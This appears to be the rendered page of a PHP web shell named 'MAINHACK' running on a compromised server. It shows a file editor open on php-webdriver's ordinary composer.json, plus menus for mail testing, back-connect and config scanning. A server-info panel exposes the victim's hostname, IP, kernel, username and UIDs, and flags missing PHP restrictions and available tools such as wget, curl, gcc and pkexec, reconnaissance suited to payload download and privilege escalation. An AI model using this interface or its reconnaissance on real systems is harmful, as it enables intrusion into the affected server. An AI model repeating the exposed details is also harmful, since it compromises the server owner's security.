[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: composer.json
{ "name": "php-webdriver/webdriver", "description": "A PHP client for Selenium WebDriver. Previously facebook/webdriver.", "license": "MIT", "type": "library", "keywords": [ "webdriver", "selenium", "php", "geckodriver", "chromedriver" ], "homepage": "https://github.com/php-webdriver/php-webdriver", "require": { "php": "^7.3 || ^8.0", "ext-curl": "*", "ext-json": "*", "ext-zip": "*", "symfony/polyfill-mbstring": "^1.12", "symfony/process": "^5.0 || ^6.0" }, "require-dev": { "ergebnis/composer-normalize": "^2.20.0", "ondram/ci-detector": "^4.0", "php-coveralls/php-coveralls": "^2.4", "php-mock/php-mock-phpunit": "^2.0", "php-parallel-lint/php-parallel-lint": "^1.2", "phpunit/phpunit": "^9.3", "squizlabs/php_codesniffer": "^3.5", "symfony/var-dumper": "^5.0 || ^6.0" }, "replace": { "facebook/webdriver": "*" }, "suggest": { "ext-SimpleXML": "For Firefox profile creation" }, "minimum-stability": "dev", "autoload": { "psr-4": { "Facebook\\WebDriver\\": "lib/" }, "files": [ "lib/Exception/TimeoutException.php" ] }, "autoload-dev": { "psr-4": { "Facebook\\WebDriver\\": [ "tests/unit", "tests/functional" ] }, "classmap": [ "tests/functional/" ] }, "config": { "allow-plugins": { "ergebnis/composer-normalize": true }, "sort-packages": true }, "scripts": { "post-install-cmd": [ "@composer install --working-dir=tools/php-cs-fixer --no-progress --no-interaction", "@composer install --working-dir=tools/phpstan --no-progress --no-interaction" ], "post-update-cmd": [ "@composer update --working-dir=tools/php-cs-fixer --no-progress --no-interaction", "@composer update --working-dir=tools/phpstan --no-progress --no-interaction" ], "all": [ "@lint", "@analyze", "@test" ], "analyze": [ "@php tools/phpstan/vendor/bin/phpstan analyze -c phpstan.neon --ansi", "@php tools/php-cs-fixer/vendor/bin/php-cs-fixer fix --diff --dry-run -vvv --ansi", "@php vendor/bin/phpcs --standard=PSR2 --ignore=*.js ./lib/ ./tests/" ], "fix": [ "@composer normalize", "@php tools/php-cs-fixer/vendor/bin/php-cs-fixer fix --diff -vvv || exit 0", "@php vendor/bin/phpcbf --standard=PSR2 --ignore=*.js ./lib/ ./tests/" ], "lint": [ "@php vendor/bin/parallel-lint -j 10 ./lib ./tests example.php", "@composer validate", "@composer normalize --dry-run" ], "test": [ "@php vendor/bin/phpunit --colors=always" ] } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.88 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002